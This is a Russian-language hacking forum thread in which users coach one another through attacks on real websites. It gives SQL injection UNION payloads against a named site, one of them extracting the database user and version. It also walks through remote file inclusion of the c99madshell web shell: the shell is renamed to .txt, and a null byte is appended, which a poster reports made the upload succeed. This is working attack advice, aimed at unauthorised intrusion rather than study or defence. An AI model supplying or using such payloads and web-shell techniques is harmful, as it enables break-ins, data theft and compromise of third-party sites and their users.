 |
|
09.01.2011, 05:40
|
|
Новичок
Регистрация: 17.08.2010
Сообщений: 12
С нами:
8282486
Репутация:
0
|
|
Сообщение от None
Забыл поставить кавычку
Вот так
Сообщение от None
%URL%?req=1'+union+selest+1,2
и так
Сообщение от None
%URL%?req=1'+union+selest+1,2--
Всё равно те же ошибки.
UPD:
Redwood, точно
Спасибо.
|
|
|
09.01.2011, 11:33
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Код:
$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a
Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е.
Код:
SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2
и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же
Код:
SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2
в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ. |
|
|
|
09.01.2011, 13:51
|
|
Новичок
Регистрация: 07.01.2011
Сообщений: 1
С нами:
8076566
Репутация:
0
|
|
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
|
|
|
|
09.01.2011, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от villagay
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
собственно в чем проблема?
Код:
http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
|
|
|
|
09.01.2011, 14:06
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
проблема в том что статьи про скули разучились читать(
|
|
|
|
09.01.2011, 14:31
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Onkelz
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.
ххх.com/index.php?con=http://site.com/c99madshell
на страице открывает шелл , с моим сайтом. ТАк должно быть ?
потом перехожу
ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?
Если нада доп. инфа говорите.
Ну тут два варианта, либо это RFI, либо просто фрейм.
В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел.
Так что дай больше информации
|
|
|
|
09.01.2011, 14:53
|
|
Познающий
Регистрация: 22.09.2010
Сообщений: 38
С нами:
8230646
Репутация:
-1
|
|
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
|
|
|
|
09.01.2011, 15:12
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Onkelz
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
|
|
|
|
09.01.2011, 15:25
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 8
С нами:
9010347
Репутация:
0
|
|
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
|
|
|
|
09.01.2011, 16:06
|
|
Познающий
Регистрация: 22.09.2010
Сообщений: 38
С нами:
8230646
Репутация:
-1
|
|
Сообщение от Expl0ited
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь.
UPD: Залил) помогло добавления нулл байта после .txt)
СПасибо за помощь! Лови +
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
